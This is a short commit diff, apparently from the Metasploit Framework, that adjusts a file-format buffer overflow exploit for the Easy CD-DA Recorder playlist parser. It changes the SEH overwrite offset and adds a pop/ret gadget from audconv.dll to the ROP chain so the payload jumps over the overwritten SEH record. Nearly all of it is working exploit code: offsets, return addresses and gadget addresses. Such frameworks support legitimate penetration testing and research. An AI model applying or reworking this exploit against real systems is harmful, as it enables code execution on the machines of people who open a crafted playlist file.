Use pop#ret to jump over the overwritten seh

jvazquez-r7 · jvazquez-r7 · commit 9845970e12af · 2014-02-12T08:10:14.000-06:00
diff --git a/modules/exploits/windows/fileformat/easycdda_pls_bof.rb b/modules/exploits/windows/fileformat/easycdda_pls_bof.rb
@@ -54,7 +54,7 @@ def initialize(info = {})
             # easycdda.exe 3.0.114.0
             # audconv.dll 7.0.815.0
             {
-              'Offset' => 1112,
+              'Offset' => 1108,
               'Ret'    => 0x1001b19b  # ADD ESP,0C10 # RETN 0x04 [audconv.dll]
             }
           ]
@@ -105,6 +105,7 @@ def exploit
     ].flatten.pack('V*')
 
     sploit =  rop_nops(target['Offset'] / 4)
+    sploit << [0x1003d55c].pack("V") # pop edi # ret [audconv.dll]
     sploit << [target.ret].pack("V")
     sploit << rop_nops(22)
     sploit << rop_gadgets

Original file line number	Diff line number	Diff line change
`@@ -54,7 +54,7 @@ def initialize(info = {})`
`54`	`54`	`# easycdda.exe 3.0.114.0`
`55`	`55`	`# audconv.dll 7.0.815.0`
`56`	`56`	`{`
`57`		`- 'Offset' => 1112,`
	`57`	`+ 'Offset' => 1108,`
`58`	`58`	`'Ret' => 0x1001b19b # ADD ESP,0C10 # RETN 0x04 [audconv.dll]`
`59`	`59`	`}`
`60`	`60`	`]`
`@@ -105,6 +105,7 @@ def exploit`
`105`	`105`	`].flatten.pack('V*')`
`106`	`106`
`107`	`107`	`sploit = rop_nops(target['Offset'] / 4)`
	`108`	`+ sploit << [0x1003d55c].pack("V") # pop edi # ret [audconv.dll]`
`108`	`109`	`sploit << [target.ret].pack("V")`
`109`	`110`	`sploit << rop_nops(22)`
`110`	`111`	`sploit << rop_gadgets`